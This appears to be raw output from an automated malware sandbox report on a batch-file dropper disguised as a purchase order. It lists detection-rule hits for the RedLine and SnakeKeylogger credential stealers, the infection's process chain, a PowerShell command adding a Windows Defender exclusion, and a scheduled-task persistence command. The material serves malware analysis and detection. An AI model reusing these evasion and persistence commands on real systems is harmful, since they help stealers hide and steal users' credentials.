Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: String function: 0040FB9C appears 60 times
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: String function: 0040D606 appears 144 times
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: String function: 0040E1D8 appears 264 times
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: String function: 00415639 appears 36 times

Source: 7.2.rpkhzpuO.pif.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 7.1.rpkhzpuO.pif.400000.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 23.1.rpkhzpuO.pif.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 7.2.rpkhzpuO.pif.26b1cfc0.11.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 7.2.rpkhzpuO.pif.26b1cfc0.11.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.rpkhzpuO.pif.26b351f0.10.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 23.1.rpkhzpuO.pif.400000.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 7.2.rpkhzpuO.pif.26b351f0.10.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.rpkhzpuO.pif.26b351f0.10.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 7.2.rpkhzpuO.pif.26b351f0.10.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 18.1.rpkhzpuO.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 9.0.Microsofts.exe.b70000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 9.0.Microsofts.exe.b70000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 23.2.rpkhzpuO.pif.400000.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 7.2.rpkhzpuO.pif.26b4d410.14.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 7.2.rpkhzpuO.pif.26b4d410.14.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.rpkhzpuO.pif.400000.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 18.2.rpkhzpuO.pif.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 18.2.rpkhzpuO.pif.400000.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 7.2.rpkhzpuO.pif.26b4d410.14.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 7.2.rpkhzpuO.pif.26b4d410.14.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 23.2.rpkhzpuO.pif.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 18.1.rpkhzpuO.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 7.1.rpkhzpuO.pif.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 7.2.rpkhzpuO.pif.26b1cfc0.11.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 7.2.rpkhzpuO.pif.26b1cfc0.11.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000009.00000000.2098416455.0000000000B72000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000012.00000001.2160139244.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000007.00000002.2099220238.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000012.00000002.2270156460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000017.00000001.2249245726.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000007.00000002.2137347669.0000000026B04000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000007.00000001.2063317653.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000017.00000002.2359070635.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: Process Memory Space: rpkhzpuO.pif PID: 6480, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: Microsofts.exe PID: 6004, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, type: DROPPED	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, type: DROPPED	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/

Source: Microsofts.exe.7.dr, UltraSpeed.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: Microsofts.exe.7.dr, COVIDPickers.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 7.2.rpkhzpuO.pif.26b1cfc0.11.raw.unpack, UltraSpeed.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 7.2.rpkhzpuO.pif.26b1cfc0.11.raw.unpack, COVIDPickers.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 7.2.rpkhzpuO.pif.26ac3d90.15.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 7.2.rpkhzpuO.pif.26ac3d90.15.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 7.2.rpkhzpuO.pif.26ac3d90.15.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 7.3.rpkhzpuO.pif.23be07b8.0.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 7.3.rpkhzpuO.pif.23be07b8.0.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 7.3.rpkhzpuO.pif.23be07b8.0.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 7.2.rpkhzpuO.pif.26b351f0.10.raw.unpack, UltraSpeed.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: classification engine

Classification label: mal100.troj.spyw.evad.winBAT@39/18@5/3

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 4_2_027C7F5C GetDiskFreeSpaceA,

4_2_027C7F5C

Source: C:\Users\Public\Libraries\rpkhzpuO.pif

Code function: 7_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,task_proc,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,

7_2_004019F0

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 4_2_027D6D50 CoCreateInstance,

4_2_027D6D50

Source: C:\Users\Public\Libraries\rpkhzpuO.pif

7_2_004019F0

Source: C:\Users\user\AppData\Local\Temp\x.exe

File created: C:\Users\Public\OupzhkprF.cmd

Jump to behavior

Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3716:120:WilError_03
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Phoenix_Clipper_666
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1560:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5532:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1496:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2284:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3228:120:WilError_03

Source: C:\Windows\System32\extrac32.exe

File created: C:\Users\user\AppData\Local\Temp\CAB04404.TMP

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\PO#5_Tower_049.bat" "

Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Command line argument: 08A	7_2_00413780
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Command line argument: 08A	7_2_00413780
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Command line argument: 08A	7_1_00413780
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Command line argument: 08A	18_2_00413780
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Command line argument: 08A	18_2_00413780
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Command line argument: 08A	18_1_00413780
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Command line argument: 08A	23_2_00413780
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Command line argument: 08A	23_2_00413780
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Command line argument: 08A	23_1_00413780

Source: C:\Users\user\AppData\Local\Temp\x.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Source: C:\Users\Public\Libraries\rpkhzpuO.pif

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\extrac32.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Microsofts.exe, 00000009.00000002.3277651726.0000000002F5C000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 00000009.00000002.3277651726.0000000002F7D000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 00000009.00000002.3277651726.0000000002F4E000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 00000009.00000002.3277651726.0000000002F3E000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 00000009.00000002.3277651726.0000000002F70000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 00000009.00000002.3289291255.0000000003E8D000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: PO#5_Tower_049.bat

ReversingLabs: Detection: 44%

Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\PO#5_Tower_049.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\extrac32.exe extrac32 /y "C:\Users\user\Desktop\PO#5_Tower_049.bat" "C:\Users\user\AppData\Local\Temp\x.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process created: C:\Users\Public\Libraries\rpkhzpuO.pif C:\Users\Public\Libraries\rpkhzpuO.pif
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe"
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process created: C:\Users\user\AppData\Local\Temp\Microsofts.exe "C:\Users\user\AppData\Local\Temp\Microsofts.exe"
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 14:45 /du 23:59 /sc daily /ri 1 /f
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\Public\Libraries\Oupzhkpr.PIF "C:\Users\Public\Libraries\Oupzhkpr.PIF"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process created: C:\Users\Public\Libraries\rpkhzpuO.pif C:\Users\Public\Libraries\rpkhzpuO.pif
Source: unknown	Process created: C:\Users\Public\Libraries\Oupzhkpr.PIF "C:\Users\Public\Libraries\Oupzhkpr.PIF"
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process created: C:\Users\Public\Libraries\rpkhzpuO.pif C:\Users\Public\Libraries\rpkhzpuO.pif
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process created: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\extrac32.exe extrac32 /y "C:\Users\user\Desktop\PO#5_Tower_049.bat" "C:\Users\user\AppData\Local\Temp\x.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process created: C:\Users\Public\Libraries\rpkhzpuO.pif C:\Users\Public\Libraries\rpkhzpuO.pif	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe"	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process created: C:\Users\user\AppData\Local\Temp\Microsofts.exe "C:\Users\user\AppData\Local\Temp\Microsofts.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 14:45 /du 23:59 /sc daily /ri 1 /f	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process created: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe"	Jump to behavior
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process created: C:\Users\Public\Libraries\rpkhzpuO.pif C:\Users\Public\Libraries\rpkhzpuO.pif
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process created: C:\Users\Public\Libraries\rpkhzpuO.pif C:\Users\Public\Libraries\rpkhzpuO.pif

